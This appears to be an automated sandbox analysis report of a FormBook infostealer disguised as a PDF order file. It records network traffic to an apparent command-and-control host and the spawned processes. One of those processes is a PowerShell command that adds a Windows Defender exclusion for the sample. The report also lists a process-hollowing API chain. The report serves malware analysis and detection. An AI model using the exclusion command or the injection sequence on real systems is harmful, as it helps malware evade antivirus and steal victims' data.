                              X-Frame-Options: SAMEORIGIN
                              Referrer-Policy: same-origin
                              Cache-Control: max-age=15
                              Expires: Mon, 23 Sep 2024 12:40:32 GMT
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I2qQWrM20N5faV9aAR3kFKH%2FGBGeHmczNqtYiKvhMjHGbQ5rmgR9MKYcWyVXj5F7YZahUvFJeV%2FHpG84WbJROtIQL11zvXWElhDfufTbV0h0WAoX3uvnphllFVLoo5wo"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                              Server-Timing: cfRequestDuration;dur=10.999918
                              X-XSS-Protection: 1; mode=block
                              X-Content-Type-Options: nosniff
                              X-Permitted-Cross-Domain-Policies: none
                              X-Download-Options: noopen
                              Server: cloudflare
                              CF-RAY: 8c7a9a33f9fa7d02-EWR
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                              Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="
                              Sep 23, 2024 14:40:17.324449062 CEST1236INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                              Data Ascii: Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="sty
                              Sep 23, 2024 14:40:17.324457884 CEST448INData Raw: 63 6f 6d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 68 65 61 64 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22
                              Data Ascii: com</h2> </div>... /.header --> <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot er
                              Sep 23, 2024 14:40:17.324471951 CEST1236INData Raw: 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 68 61 76 65 20 49 20 62 65 65 6e 20 62 6c 6f 63
                              Data Ascii: olumn"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itself from online attacks. The action you just
                              Sep 23, 2024 14:40:17.324484110 CEST1181INData Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 68 69 64
                              Data Ascii: m:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span c


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.549720154.21.81.142801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Sep 23, 2024 14:40:58.179536104 CEST166OUTGET /rn94/?jDHh=Fx60rCVvY/PfTPS+x0Yy+mO10iBB7HzlvlxbYnAbTZ/GodXDJ0QLvzTZw6Pc1HX1Gik3&9r9Hc=ytxTjD5hRxA HTTP/1.1
                              Host: www.qwechaotk.top
                              Connection: close
                              Data Raw: 00 00 00 00 00 00 00
                              Data Ascii:


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:08:38:34
                              Start date:23/09/2024
                              Path:C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
                              Imagebase:0x940000
                              File size:611'840 bytes
                              MD5 hash:A2082543A1C1028DD0A613A6A2AF4D21
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:08:38:35
                              Start date:23/09/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
                              Imagebase:0xfe0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:08:38:35
                              Start date:23/09/2024
                              Path:C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
                              Imagebase:0x5f0000
                              File size:611'840 bytes
                              MD5 hash:A2082543A1C1028DD0A613A6A2AF4D21
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:low
                              Has exited:true

                              Target ID:5
                              Start time:08:38:36
                              Start date:23/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:08:38:36
                              Start date:23/09/2024
                              Path:C:\Windows\explorer.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Explorer.EXE
                              Imagebase:0x7ff674740000
                              File size:5'141'208 bytes
                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.4551128208.000000000F01C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:false

                              Target ID:7
                              Start time:08:38:38
                              Start date:23/09/2024
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff6ef0c0000
                              File size:496'640 bytes
                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:8
                              Start time:08:38:40
                              Start date:23/09/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                              Imagebase:0xa00000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:high
                              Has exited:false

                              Target ID:9
                              Start time:08:38:43
                              Start date:23/09/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:/c del "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
                              Imagebase:0x790000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:10
                              Start time:08:38:43
                              Start date:23/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Reset < >

                                Execution Graph

                                Execution Coverage:10.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:4.7%
                                Total number of Nodes:169
                                Total number of Limit Nodes:7
                                execution_graph 32649 107d040 32650 107d086 32649->32650 32654 107d619 32650->32654 32657 107d628 32650->32657 32651 107d173 32660 107d27c 32654->32660 32658 107d656 32657->32658 32659 107d27c DuplicateHandle 32657->32659 32658->32651 32659->32658 32661 107d690 DuplicateHandle 32660->32661 32662 107d656 32661->32662 32662->32651 32674 fbd01c 32675 fbd034 32674->32675 32676 fbd08e 32675->32676 32679 5272808 32675->32679 32684 5272818 32675->32684 32680 5272845 32679->32680 32681 5272877 32680->32681 32689 52729a0 32680->32689 32693 5272990 32680->32693 32685 5272845 32684->32685 32686 5272877 32685->32686 32687 52729a0 2 API calls 32685->32687 32688 5272990 2 API calls 32685->32688 32687->32686 32688->32686 32691 52729b4 32689->32691 32690 5272a40 32690->32681 32697 5272a58 32691->32697 32695 52729b4 32693->32695 32694 5272a40 32694->32681 32696 5272a58 2 API calls 32695->32696 32696->32694 32698 5272a69 32697->32698 32700 5274012 32697->32700 32698->32690 32704 5274030 32700->32704 32708 5274040 32700->32708 32701 527402a 32701->32698 32705 5274040 32704->32705 32706 52740da CallWindowProcW 32705->32706 32707 5274089 32705->32707 32706->32707 32707->32701 32709 5274082 32708->32709 32711 5274089 32708->32711 32710 52740da CallWindowProcW 32709->32710 32709->32711 32710->32711 32711->32701 32861 107acb0 32862 107acbf 32861->32862 32865 107ada8 32861->32865 32870 107ad97 32861->32870 32866 107addc 32865->32866 32867 107adb9 32865->32867 32866->32862 32867->32866 32868 107afe0 GetModuleHandleW 32867->32868 32869 107b00d 32868->32869 32869->32862 32871 107adb9 32870->32871 32872 107addc 32870->32872 32871->32872 32873 107afe0 GetModuleHandleW 32871->32873 32872->32862 32874 107b00d 32873->32874 32874->32862 32663 7613878 32664 7613a38 32663->32664 32666 761389e 32663->32666 32665 7613a03 32666->32665 32669 7613f00 PostMessageW 32666->32669 32671 7613efb 32666->32671 32670 7613f6c 32669->32670 32670->32666 32672 7613f00 PostMessageW 32671->32672 32673 7613f6c 32672->32673 32673->32666 32712 76113c8 32716 76126e0 32712->32716 32728 76126d0 32712->32728 32713 76113b1 32717 76126fa 32716->32717 32723 7612702 32717->32723 32740 7612dc6 32717->32740 32744 7612c04 32717->32744 32753 7612f93 32717->32753 32757 7612d2f 32717->32757 32769 7612cdc 32717->32769 32774 76131ed 32717->32774 32779 7612f0a 32717->32779 32784 7612c49 32717->32784 32788 7612b29 32717->32788 32723->32713 32729 76126fa 32728->32729 32730 7612f93 2 API calls 32729->32730 32731 7612c04 4 API calls 32729->32731 32732 7612dc6 2 API calls 32729->32732 32733 7612b29 2 API calls 32729->32733 32734 7612c49 2 API calls 32729->32734 32735 7612702 32729->32735 32736 7612f0a 2 API calls 32729->32736 32737 76131ed 2 API calls 32729->32737 32738 7612cdc 2 API calls 32729->32738 32739 7612d2f 6 API calls 32729->32739 32730->32735 32731->32735 32732->32735 32733->32735 32734->32735 32735->32713 32736->32735 32737->32735 32738->32735 32739->32735 32792 76109c0 32740->32792 32796 76109b9 32740->32796 32741 7612de0 32741->32723 32745 7612bb9 32744->32745 32745->32744 32746 7612c34 32745->32746 32800 7610a91 32745->32800 32804 7610a98 32745->32804 32747 7613413 32746->32747 32808 7610b51 32746->32808 32812 7610b58 32746->32812 32748 7612f55 32755 7610b51 WriteProcessMemory 32753->32755 32756 7610b58 WriteProcessMemory 32753->32756 32754 7612fc1 32755->32754 32756->32754 32765 76109c0 Wow64SetThreadContext 32757->32765 32766 76109b9 Wow64SetThreadContext 32757->32766 32758 7612b8b 32759 7612b9d 32758->32759 32767 7610a91 VirtualAllocEx 32758->32767 32768 7610a98 VirtualAllocEx 32758->32768 32759->32723 32760 7613413 32761 7612c34 32761->32760 32763 7610b51 WriteProcessMemory 32761->32763 32764 7610b58 WriteProcessMemory 32761->32764 32762 7612f55 32763->32762 32764->32762 32765->32758 32766->32758 32767->32761 32768->32761 32770 7612ce2 32769->32770 32816 7610910 32770->32816 32820 7610908 32770->32820 32771 7612c9d 32771->32723 32775 7612cfa 32774->32775 32776 7612c9d 32775->32776 32777 7610910 ResumeThread 32775->32777 32778 7610908 ResumeThread 32775->32778 32776->32723 32777->32776 32778->32776 32780 7612f23 32779->32780 32782 7610b51 WriteProcessMemory 32780->32782 32783 7610b58 WriteProcessMemory 32780->32783 32781 7612f55 32782->32781 32783->32781 32824 7610c40 32784->32824 32828 7610c48 32784->32828 32785 7612bf0 32785->32723 32832 7610de0 32788->32832 32836 7610dd4 32788->32836 32793 7610a05 Wow64SetThreadContext 32792->32793 32795 7610a4d 32793->32795 32795->32741 32797 76109c0 Wow64SetThreadContext 32796->32797 32799 7610a4d 32797->32799 32799->32741 32801 7610a98 VirtualAllocEx 32800->32801 32803 7610b15 32801->32803 32803->32746 32805 7610ad8 VirtualAllocEx 32804->32805 32807 7610b15 32805->32807 32807->32746 32809 7610b58 WriteProcessMemory 32808->32809 32811 7610bf7 32809->32811 32811->32748 32813 7610ba0 WriteProcessMemory 32812->32813 32815 7610bf7 32813->32815 32815->32748 32817 7610950 ResumeThread 32816->32817 32819 7610981 32817->32819 32819->32771 32821 7610910 ResumeThread 32820->32821 32823 7610981 32821->32823 32823->32771 32825 7610c47 32824->32825 32826 7610ca9 ReadProcessMemory 32824->32826 32825->32826 32827 7610cd7 32826->32827 32827->32785 32829 7610c93 ReadProcessMemory 32828->32829 32831 7610cd7 32829->32831 32831->32785 32833 7610e69 CreateProcessA 32832->32833 32835 761102b 32833->32835 32837 7610e69 CreateProcessA 32836->32837 32839 761102b 32837->32839 32840 1074668 32841 107467a 32840->32841 32842 1074686 32841->32842 32844 1074778 32841->32844 32845 107479d 32844->32845 32849 1074888 32845->32849 32853 1074878 32845->32853 32851 10748af 32849->32851 32850 107498c 32850->32850 32851->32850 32857 10744b0 32851->32857 32855 1074888 32853->32855 32854 107498c 32854->32854 32855->32854 32856 10744b0 CreateActCtxA 32855->32856 32856->32854 32858 1075918 CreateActCtxA 32857->32858 32860 10759db 32858->32860

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2128896097.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5270000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: Pphq
                                • API String ID: 0-882776299
                                • Opcode ID: 659dddffa06707add495deb31b69ff71fcd108296c2ac1f93a3b5a67a623a126
                                • Instruction ID: 1dfdcf13c668b79a731132ec389a10f454bc6d676eaee67b85d3fa4500d5ad6c
                                • Opcode Fuzzy Hash: 659dddffa06707add495deb31b69ff71fcd108296c2ac1f93a3b5a67a623a126
                                • Instruction Fuzzy Hash: 3C42D674A10719CFDB14DFA4C994A9DB7B2FF89300F2185A9E409AB365DB70AE85CF40

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2128896097.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5270000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: Pphq
                                • API String ID: 0-882776299
                                • Opcode ID: 8f1cbc489559321b99d6c0917f93b785317376e29de61910ea2346a0881565e7
                                • Instruction ID: 824d129693a45ec0245adce16e226ecd40eb328d504e87385556937aa5faec7b
                                • Opcode Fuzzy Hash: 8f1cbc489559321b99d6c0917f93b785317376e29de61910ea2346a0881565e7
                                • Instruction Fuzzy Hash: FB42C734A11719CFDB14DFA4C994A9DB7B2FF89300F2085A9E409AB365DB70AE85CF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d3aaa4af3de3e277f04aa5e1bab5b81293c45218dff741e604bb9a0c5f0cc576
                                • Instruction ID: e62114b5832042e61163befd1f7c9ca3fc6a5d87f95a83ce693ed5abc5fac97b
                                • Opcode Fuzzy Hash: d3aaa4af3de3e277f04aa5e1bab5b81293c45218dff741e604bb9a0c5f0cc576
                                • Instruction Fuzzy Hash: A5C1ABB0B016858FDB19DB75C458BAEBBFAAF89700F18846DD1468B390CF35E801CB51
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f20b0b1afe8ba5498737da31fb5d77fbb3d045f9b52f14bfd23f97531a6676c1
                                • Instruction ID: be7e5bef2d55993605f24ee7741ea9a942d74df81a78171ae2a7291caa2c4c47
                                • Opcode Fuzzy Hash: f20b0b1afe8ba5498737da31fb5d77fbb3d045f9b52f14bfd23f97531a6676c1
                                • Instruction Fuzzy Hash: EA212CB9919158CFCB24DF65D8987E8BBB4AF5B321F0860E6980FA7351DB305A85CF10
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 30a5b2334041feb1c04b9d8702a9b577d515eadcc125f9242e4c1b89bad07c4a
                                • Instruction ID: 73431b2ebd047bfcb9e6ec127f09cfce6fc18366086683cde02694887b4c61e8
                                • Opcode Fuzzy Hash: 30a5b2334041feb1c04b9d8702a9b577d515eadcc125f9242e4c1b89bad07c4a
                                • Instruction Fuzzy Hash: 98113DB9919158CFCB24DF55D8986F8BBB8FB5A311F0860E6D80FA6351CB305A86CF10
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1559881b246f70da2d2607125afd3808c79ec26a447eab7d65386b7103dfca10
                                • Instruction ID: 3ae4b66ecca0f08be1259862e040a09047daad3b1edbf02d7d7ed68e701b7bb7
                                • Opcode Fuzzy Hash: 1559881b246f70da2d2607125afd3808c79ec26a447eab7d65386b7103dfca10
                                • Instruction Fuzzy Hash: 080152B591D298CFCB20DF65D4582F8BFB8AB17311F0920E6D80F96352DB301A86CB15
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 41d403a285b67e2357c39e3e23b27cb925e307313ee85728dc364fb0fdfb73e4
                                • Instruction ID: 5405a31e6dddd3247ddf22f65ba6bdb80a57bd0877743c211036ec385cbd2ef4
                                • Opcode Fuzzy Hash: 41d403a285b67e2357c39e3e23b27cb925e307313ee85728dc364fb0fdfb73e4
                                • Instruction Fuzzy Hash: 10E04FB5D1E048CBCB109EA5A9981F4BBB8D747211F0930B5C50F97702D5315615CA25

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1206 7610dd4-7610e75 1208 7610e77-7610e81 1206->1208 1209 7610eae-7610ece 1206->1209 1208->1209 1210 7610e83-7610e85 1208->1210 1214 7610ed0-7610eda 1209->1214 1215 7610f07-7610f36 1209->1215 1212 7610e87-7610e91 1210->1212 1213 7610ea8-7610eab 1210->1213 1216 7610e93 1212->1216 1217 7610e95-7610ea4 1212->1217 1213->1209 1214->1215 1218 7610edc-7610ede 1214->1218 1225 7610f38-7610f42 1215->1225 1226 7610f6f-7611029 CreateProcessA 1215->1226 1216->1217 1217->1217 1219 7610ea6 1217->1219 1220 7610f01-7610f04 1218->1220 1221 7610ee0-7610eea 1218->1221 1219->1213 1220->1215 1223 7610eec 1221->1223 1224 7610eee-7610efd 1221->1224 1223->1224 1224->1224 1227 7610eff 1224->1227 1225->1226 1228 7610f44-7610f46 1225->1228 1237 7611032-76110b8 1226->1237 1238 761102b-7611031 1226->1238 1227->1220 1230 7610f69-7610f6c 1228->1230 1231 7610f48-7610f52 1228->1231 1230->1226 1232 7610f54 1231->1232 1233 7610f56-7610f65 1231->1233 1232->1233 1233->1233 1234 7610f67 1233->1234 1234->1230 1248 76110c8-76110cc 1237->1248 1249 76110ba-76110be 1237->1249 1238->1237 1250 76110dc-76110e0 1248->1250 1251 76110ce-76110d2 1248->1251 1249->1248 1252 76110c0 1249->1252 1254 76110f0-76110f4 1250->1254 1255 76110e2-76110e6 1250->1255 1251->1250 1253 76110d4 1251->1253 1252->1248 1253->1250 1257 7611106-761110d 1254->1257 1258 76110f6-76110fc 1254->1258 1255->1254 1256 76110e8 1255->1256 1256->1254 1259 7611124 1257->1259 1260 761110f-761111e 1257->1260 1258->1257 1261 7611125 1259->1261 1260->1259 1261->1261
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07611016
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 60bcd42d1b51265a7056d09b3ed1f0f23e14c60016644b59263bde7a6eed332b
